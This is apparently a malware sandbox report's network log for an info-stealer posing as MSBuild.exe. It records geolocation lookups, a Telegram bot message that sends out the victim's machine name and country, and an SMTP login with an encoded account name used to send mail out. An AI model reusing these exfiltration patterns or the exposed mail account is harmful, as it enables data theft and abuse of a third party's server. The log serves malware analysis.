                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23331
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hP9Qc2MN%2FSZp%2FjD10%2BAn%2Bm3rdCFapmWeWVdCQe%2BYLqjuhiIN7ENk0B401GVwYmS5lPxtxe7f8HruMDB8QNwpzVONgTv2rKYVfN9rwSdVCSRWRKh5WfPSjgQGzMFUjw0sUyx9Amo%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded19488998485d-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2976361&cwnd=251&unsent_bytes=0&cid=69b2f82141e196e4&ts=148&x=0"
                                                                                                              2024-11-07 11:49:13 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                                                                              2024-11-07 11:49:13 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.1249724188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:15 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2024-11-07 11:49:15 UTC1213INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:15 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23333
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zI0WqIx7l%2Bk50ZVjBj7ZKUHz6NSvthod7MKmJRyR0M349IhKibEO3NvC3k1cWNlWpRvEZbTDtRHI6qdIjzatZ1eAlLi170HPNw5BGGDFHW6NwfbcbGWByGG29nqZpcAjlXqS72Mw"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded19516d5b4689-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1165&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2477331&cwnd=251&unsent_bytes=0&cid=4134970c74e33361&ts=149&x=0"
                                                                                                              2024-11-07 11:49:15 UTC156INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
                                                                                                              2024-11-07 11:49:15 UTC203INData Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.1249726188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:16 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:16 UTC1219INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23334
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xNCG8sr3iW5cVU9KfpS%2FszpLUwdOCRNbrq9MGu21Mt7y5AtEDzEOboeWTtZKlnVwSqaaFlgsmwu7Z5hCMHz2%2BbRDH3F9iX0GXA96SCSZ4cX3k0WJ%2FXO%2FyDEgNGgBt2kBeHNPGR5l"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded195baa98e78a-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2159582&cwnd=237&unsent_bytes=0&cid=3d66cd67f3947147&ts=355&x=0"
                                                                                                              2024-11-07 11:49:16 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                                                                              2024-11-07 11:49:16 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.1249728188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:18 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:18 UTC1217INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:18 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23336
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1M5BkSn2b%2BMsGyoXMRxMuvMdUzt3qPeo9TFv38y0J5ISCaVATlc2NGcBDigFH3ejSM96oPAB7dD5udjYs1D0Bs%2BtHc0mSnD1yA%2BC1Uc97gLZbO1kAmeXMFrmIAVtMo5awlMx5EB"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded1965e8296b38-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2212375&cwnd=251&unsent_bytes=0&cid=46e9331f56793b34&ts=149&x=0"
                                                                                                              2024-11-07 11:49:18 UTC152INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                                                                                              2024-11-07 11:49:18 UTC207INData Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.1249730188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:19 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:19 UTC1219INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23337
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuOnoQucPCU%2FrZr3CB%2BD2zcOkAslut6qV5bLOoa0%2ByCsmVdoekxNzmdILM06IqEgusONt%2BwCeUmati7ZOyFEzXfsv78Dvveek9OxJC4bCyJ4cX2ahf6k3SHDgnrlisin8gVHKvbr"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded196eab41e75e-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1576&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1887874&cwnd=251&unsent_bytes=0&cid=d442763031eaaa32&ts=144&x=0"
                                                                                                              2024-11-07 11:49:19 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                                                                              2024-11-07 11:49:19 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.1249732188.114.96.34431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:21 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:21 UTC1215INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 07 Nov 2024 11:49:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 359
                                                                                                              Connection: close
                                                                                                              x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                              x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                              x-cache: Miss from cloudfront
                                                                                                              via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                              x-amz-cf-pop: DFW57-P5
                                                                                                              x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              CF-Cache-Status: HIT
                                                                                                              Age: 23339
                                                                                                              Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jWjh1hGZUWnMj89kWGiTU9AOw6atyrZOl9iNxZOFhZ2Oh9fb46lnLNhlmd4lHnjsuE6zNR3bXludflSsK6SO9F8etpRVdj0hGLVQwdb%2BT56Ph4%2BADNASbuN9zA1hGYXZDlOqPb81"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ded197749e64796-DFW
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1137&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2498705&cwnd=244&unsent_bytes=0&cid=8ab8cc6d5b2a972d&ts=147&x=0"
                                                                                                              2024-11-07 11:49:21 UTC154INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
                                                                                                              Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
                                                                                                              2024-11-07 11:49:21 UTC205INData Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                              Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.1249733149.154.167.2204431016C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-11-07 11:49:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-11-07 11:49:22 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 07 Nov 2024 11:49:22 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-11-07 11:49:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Nov 7, 2024 12:49:29.313038111 CET58749741212.44.112.138192.168.2.12220-rcp-43.controlpanel.si ESMTP Exim 4.96.2 #2 Thu, 07 Nov 2024 12:49:29 +0100
                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                              220 and/or bulk e-mail.
                                                                                                              Nov 7, 2024 12:49:29.313397884 CET49741587192.168.2.12212.44.112.138EHLO 783875
                                                                                                              Nov 7, 2024 12:49:29.576176882 CET58749741212.44.112.138192.168.2.12250-rcp-43.controlpanel.si Hello 783875 [173.254.250.79]
                                                                                                              250-SIZE 52428800
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-PIPECONNECT
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-STARTTLS
                                                                                                              250 HELP
                                                                                                              Nov 7, 2024 12:49:29.576847076 CET49741587192.168.2.12212.44.112.138AUTH login c3BsZXRuYXN0cmFuQHRsYWtvdmVjLnNp
                                                                                                              Nov 7, 2024 12:49:29.839657068 CET58749741212.44.112.138192.168.2.12334 UGFzc3dvcmQ6
                                                                                                              Nov 7, 2024 12:49:30.143505096 CET58749741212.44.112.138192.168.2.12235 Authentication succeeded
                                                                                                              Nov 7, 2024 12:49:30.143800974 CET49741587192.168.2.12212.44.112.138MAIL FROM:<spletnastran@tlakovec.si>
